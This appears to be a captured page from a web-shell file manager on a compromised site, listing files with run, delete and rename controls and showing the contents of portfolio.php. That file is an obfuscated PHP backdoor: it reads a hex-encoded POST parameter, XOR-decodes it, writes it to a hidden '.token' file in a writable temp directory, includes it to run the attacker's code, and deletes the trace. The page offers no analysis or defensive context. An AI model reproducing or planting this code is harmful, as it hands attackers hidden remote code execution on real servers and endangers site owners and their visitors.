at path:
ROOT
/
portfolio.php
run:
R
W
Run
.htaccess
231 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
708 By
2026-04-08 12:38:12
R
W
Run
Delete
Rename
portfolio.php
603 By
2026-04-08 12:38:59
R
W
Run
Delete
Rename
robots.txt
955 By
2026-04-06 01:44:06
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so.php
909 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so_SO.php
697 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
up
📄
portfolio.php
Save
<?php if(isset($_POST) && isset($_POST["\x66\x61c"])){ $dchunk = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/tmp", session_save_path(), getenv("TMP"), "/var/tmp", getenv("TEMP")]); $flg = hex2bin($_POST["\x66\x61c"]); $bind= '' ; $y = 0; while($y < strlen($flg)){$bind .= chr(ord($flg[$y]) ^ 58);$y++;} while ($res = array_shift($dchunk)) { if (!!is_dir($res) && !!is_writable($res)) { $marker = str_replace("{var_dir}", $res, "{var_dir}/.token"); if (file_put_contents($marker, $bind)) { include $marker; @unlink($marker); exit; } } } }